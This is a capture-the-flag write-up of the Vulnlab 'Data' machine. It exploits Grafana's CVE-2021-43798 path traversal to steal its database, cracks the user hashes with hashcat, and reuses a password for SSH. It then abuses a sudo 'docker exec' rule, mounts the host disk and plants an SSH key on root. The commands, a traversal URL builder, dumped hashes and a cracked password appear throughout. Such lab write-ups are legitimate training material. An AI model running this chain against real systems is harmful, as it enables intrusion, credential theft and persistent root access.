Machine details#
Machine | OS | Difficulty |
---|---|---|
Data | Linux | Easy |
Reconnaissance#
I started by running network scans against the target to look for open ports. From both the TCP and UDP scans, only two TCP ports showed up:
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
3000/tcp open ppp syn-ack ttl 62
Looking closer with an nmap script scan, I got the following result, which helped me identify an outdated (but not particularly interesting) OpenSSH service on port 22/TCP and an HTTP service on port 3000/TCP:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a4:b2:78:e2:2b:12:89:45:ee:77:c5:99:72:25:b3:9d (RSA)
| 256 3d:3c:50:95:39:d2:dc:14:5f:f3:6e:51:be:99:d8:45 (ECDSA)
|_ 256 6a:1f:7f:2e:80:f6:52:97:45:db:55:3e:63:da:a0:6d (ED25519)
3000/tcp open ppp?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity.txt%252ebak; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Sat, 10 Aug 2024 18:54:26 GMT
| Content-Length: 29
| href="/login">Found</a>.
| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Sat, 10 Aug 2024 18:53:55 GMT
| Content-Length: 29
| href="/login">Found</a>.
| HTTPOptions:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Sat, 10 Aug 2024 18:54:00 GMT
|_ Content-Length: 0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
SITREP#
At this point I knew:
- Two open TCP ports, with OpenSSH and HTTP services running on them.
HTTP analysis#
Reaching the HTTP service, I noted it was running Grafana, seemingly at version 8.0.0 (the version is stated under the login form), which is vulnerable to a path traversal vulnerability (CVE-2021-43798). This is funny because I personally found this same vulnerability during an assessment earlier this year, and while I was looking for more information about it, I found this very interesting blog post, as it goes beyond the “oh my god, we can dump /etc/passwd” stage: https://vulncheck.com/blog/grafana-cve-2021-43798.
Initial access#
To exploit the path traversal vulnerability, a simple HTTP GET request with curl is enough. But this time I wanted to play with the Python script available on Exploit-DB (https://www.exploit-db.com/exploits/50581), which I modified a bit to actually save the file.
$ python3 50581.py -H http://$IP:3000
Read file > /etc/passwd
root:x:0:0:root:/root:/bin/ash
[...]
grafana:x:472:0:Linux User,,,:/home/grafana:/sbin/nologin
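For reference, the underlying request is just a traversal through a plugin’s public asset path. Here is a minimal sketch of how such a URL can be built; the helper name, plugin choice, and traversal depth are my assumptions (any existing plugin id, such as mysql, works as the prefix):

```python
# Sketch of a CVE-2021-43798 path-traversal URL builder (hypothetical helper).
def traversal_url(base: str, target_file: str,
                  plugin: str = "mysql", depth: int = 7) -> str:
    # Each "../" walks up one level from the plugin's public asset directory.
    return (f"{base}/public/plugins/{plugin}/"
            + "../" * depth
            + target_file.lstrip("/"))

url = traversal_url("http://10.10.121.232:3000", "/etc/passwd")
print(url)
```

With curl, the equivalent request needs `--path-as-is`, since curl normalizes away the `../` segments by default.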
I looked into /etc/grafana/grafana.ini, but found nothing useful, only a default, useless password. So I went for the DB available at /var/lib/grafana/grafana.db.
My modification to the script actually corrupted the file, so I fell back on the good old curl way.
No API keys, no auth tokens, no sessions; only my failed login attempts in the login_attempt table and two users in the user table.
$ sqlite3 grafana.db
sqlite> .tables
alert login_attempt
alert_configuration migration_log
alert_instance org
alert_notification org_user
alert_notification_state playlist
alert_rule playlist_item
alert_rule_tag plugin_setting
alert_rule_version preferences
annotation quota
annotation_tag server_lock
api_key session
cache_data short_url
dashboard star
dashboard_acl tag
dashboard_provisioning team
dashboard_snapshot team_member
dashboard_tag temp_user
dashboard_version test_data
data_source user
library_element user_auth
library_element_connection user_auth_token
Extracting the users’ info:
sqlite> select * from user;
1|0|admin|admin@localhost||7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8|YObSoLj55S|hLLY6QQ4Y6||1|1|0||2022-01-23 12:48:04|2022-01-23 12:48:50|0|2022-01-23 12:48:50|0
2|0|boris|[email protected]|boris|dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8|LCBhdtJWjl|mYl941ma8w||1|0|0||2022-01-23 12:49:11|2022-01-23 12:49:11|0|2012-01-23 12:49:11|0
The next step is to transform them into a format hashcat can read and crack them. These are the parts (email|hash|salt) used to crack the hashes:
admin@localhost|7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8|YObSoLj55S
boris|dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8|LCBhdtJWjl
Be careful, because the devil is in the details: in the admin row, if you do not look closely you’ll grab two consecutive pipes (||) instead of only one, so delete one before feeding the values to the script.
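Since the row fields are pipe-separated and empty fields produce consecutive pipes, splitting programmatically sidesteps the copy-paste trap entirely. A small sketch using the admin row from above (field indices follow the dump):

```python
# Fields in the sqlite output are |-separated; empty fields yield "||",
# which is what makes eyeballing the admin row error-prone.
row = ("1|0|admin|admin@localhost||7a919e4bbe95cf5104edf354ee2e6234efac1ca1f8"
       "1426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8|YObSoLj55S"
       "|hLLY6QQ4Y6||1|1|0||2022-01-23 12:48:04|2022-01-23 12:48:50|0"
       "|2022-01-23 12:48:50|0")

fields = row.split("|")
login, email = fields[2], fields[3]
pwd_hash, salt = fields[5], fields[6]   # fields[4] is the empty "name" column
print(f"{email}|{pwd_hash}|{salt}")
```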
Cracking hashes#
You may have been wondering why it was funny for me to have found this vulnerability during an assessment. Well, it is because to transform the hashes for hashcat, I actually used a script a Vulnlab user wrote for this very machine in the past: https://raw.githubusercontent.com/persees/grafana_exploits/main/decoder.py.
$ python3 grafana2hashcat.py
sha256:10000:WU9iU29MajU1Uw==:epGeS76Vz1EE7fNU7i5iNO+sHKH4FCaESiTE32ExMizzcjySFkthcunnP696TCBy+Pg=
sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=
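The conversion itself is compact: Grafana stores the PBKDF2 digest hex-encoded next to a plaintext salt, while hashcat mode 10900 wants `sha256:<iterations>:<b64 salt>:<b64 digest>`. A minimal re-implementation of that decoder logic (the function name is mine):

```python
import base64

def grafana2hashcat(hex_hash: str, salt: str, iterations: int = 10000) -> str:
    # Grafana stores the PBKDF2-HMAC-SHA256 digest hex-encoded; hashcat
    # mode 10900 expects both the salt and raw digest base64-encoded.
    b64_salt = base64.b64encode(salt.encode()).decode()
    b64_hash = base64.b64encode(bytes.fromhex(hex_hash)).decode()
    return f"sha256:{iterations}:{b64_salt}:{b64_hash}"

print(grafana2hashcat(
    "7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322c"
    "f3723c92164b6172e9e73faf7a4c2072f8f8",
    "YObSoLj55S"))
```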
Then, I powered on the hashripper and launched the cracking with the following command:
$ hashcat -m 10900 grafana-hashes.txt /usr/share/wordlists/rockyou.txt -o bingo
Using rockyou without any rules or magic, I recovered only boris’ password: beautiful1.
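As a sanity check, the recovered password can be verified offline: the `sha256:10000:` prefix above tells us the scheme is PBKDF2-HMAC-SHA256 with 10,000 iterations, and the 100-hex-character digest implies a 50-byte key. A quick check with the standard library, using boris’ hash and salt from the dump:

```python
import hashlib

# Stored digest and salt for boris, taken from the grafana.db user table.
stored = ("dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd3"
          "9d156be220745be3cbe49353e35f53b51da8")
derived = hashlib.pbkdf2_hmac("sha256", b"beautiful1", b"LCBhdtJWjl",
                              10000, dklen=50)
print(derived.hex() == stored)
```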
SITREP#
- I have exploited a known path traversal vulnerability in Grafana, which led to the extraction of its DB.
- From the DB, I have dumped two users’ hashes.
- Out of two hashes, I have cracked one.
Host discovery#
After some password spraying, it turned out that boris is a lazy user: his password works for SSH too:
$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" boris@$IP
Once inside, the hostname intrigued me, so I decided to look at the NICs, and I found out that Docker was running on this host (interface docker0).
boris@ip-10-10-10-11:~$ ip -c a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc fq_codel state UP group default qlen 1000
link/ether 0a:b0:55:4e:ce:7b brd ff:ff:ff:ff:ff:ff
inet 10.10.121.232/18 brd 10.10.127.255 scope global dynamic eth0
valid_lft 3368sec preferred_lft 3368sec
inet6 fe80::8b0:55ff:fe4e:ce7b/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:95:27:66:16 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:95ff:fe27:6616/64 scope link
valid_lft forever preferred_lft forever
5: veth6197ca1@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> m
Then, it turned out that boris could run /snap/bin/docker exec * as root; this could be a nice vector to gain root access:
boris@ip-10-10-10-11:~$ sudo -l
Matching Defaults entries for boris on ip-10-10-10-11:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User boris may run the following commands on ip-10-10-10-11:
(root) NOPASSWD: /snap/bin/docker exec *
To actually execute something with docker exec, I needed a container ID. Before interacting with Grafana, which was probably running inside the container, I took a look at the running processes:
boris@ip-10-10-10-11:/home/ubuntu$ ps aux | grep docker
[...]
root 1647 0.0 0.8 712860 8468 ? Sl 18:52 0:01 /snap/docker/1125/bin/containerd-shim-runc-v2 -namespace moby -id e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339d4b81 -address /run/snap.docker/containerd/containerd.sock
[...]
One row gave me a candidate for the ID. Issuing the magic command brought me into the container as root:
sudo /snap/bin/docker exec --privileged --user 0 -ti e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7 sh
/usr/share/grafana # whoami
root
Privilege escalation#
SITREP#
- I successfully got into the Docker container as root by abusing the sudo privilege.
- Now I can escalate to root on the host by mounting its disk.
At this point, it is pretty straightforward. I have to prepare a directory where I’ll mount the entire filesystem:
/usr/share/grafana # mkdir -p /mnt/pwned
/usr/share/grafana # ls -la /mnt
total 12
drwxr-xr-x 1 root root 4096 Aug 10 20:17 .
drwxr-xr-x 1 root root 4096 Jan 23 2022 ..
drwxr-xr-x 2 root root 4096 Aug 10 20:17 pwned
Now, I have to identify the correct disk device:
/usr/share/grafana # ls -la /dev/
[...]
brw-rw---- 1 root disk 202, 1 Aug 10 18:52 xvda1
[...]
/usr/share/grafana # fdisk -l
Disk /dev/xvda: 8192 MB, 8589934592 bytes, 16777216 sectors
6367 cylinders, 85 heads, 31 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Device Boot StartCHS EndCHS StartLBA EndLBA Sectors Size Id Type
/dev/xvda1 * 0,32,33 20,84,31 2048 16777182 16775135 8190M 83 Linux
Finally, mount it on the pwned directory:
/usr/share/grafana # mount /dev/xvda1 /mnt/pwned/
At this point, I have root access to the whole host filesystem, meaning I can read, write, and delete files pretty much anywhere. The first move would be checking for root’s private key, but there is none, so I added my public key to the authorized_keys file.
/mnt/pwned/root/.ssh # ls -la
total 12
drwx------ 2 root root 4096 Jan 23 2022 .
drwx------ 7 root root 4096 Aug 10 20:26 ..
-rw------- 1 root root 653 Aug 10 20:25 authorized_keys
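The key drop itself is just an append plus sane permissions. A safe-to-replay sketch, using a scratch directory in place of the real /mnt/pwned mount point and a placeholder key:

```python
import os
import tempfile

# Scratch stand-in for the mounted host filesystem (/mnt/pwned on target).
mnt = tempfile.mkdtemp()
ssh_dir = os.path.join(mnt, "root", ".ssh")
os.makedirs(ssh_dir, mode=0o700, exist_ok=True)

pubkey = "ssh-ed25519 AAAAC3Nz...placeholder attacker@kali\n"  # hypothetical key
auth_keys = os.path.join(ssh_dir, "authorized_keys")
with open(auth_keys, "a") as fh:        # append, keeping any existing keys
    fh.write(pubkey)
os.chmod(auth_keys, 0o600)              # restrictive perms expected by sshd
```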
Then, I walked in through the front door:
$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i id_rsa root@$IP
root@ip-10-10-10-11:~# whoami;hostname;cat root.txt
root
ip-10-10-10-11
VL{*-thanks-vulnlab-*}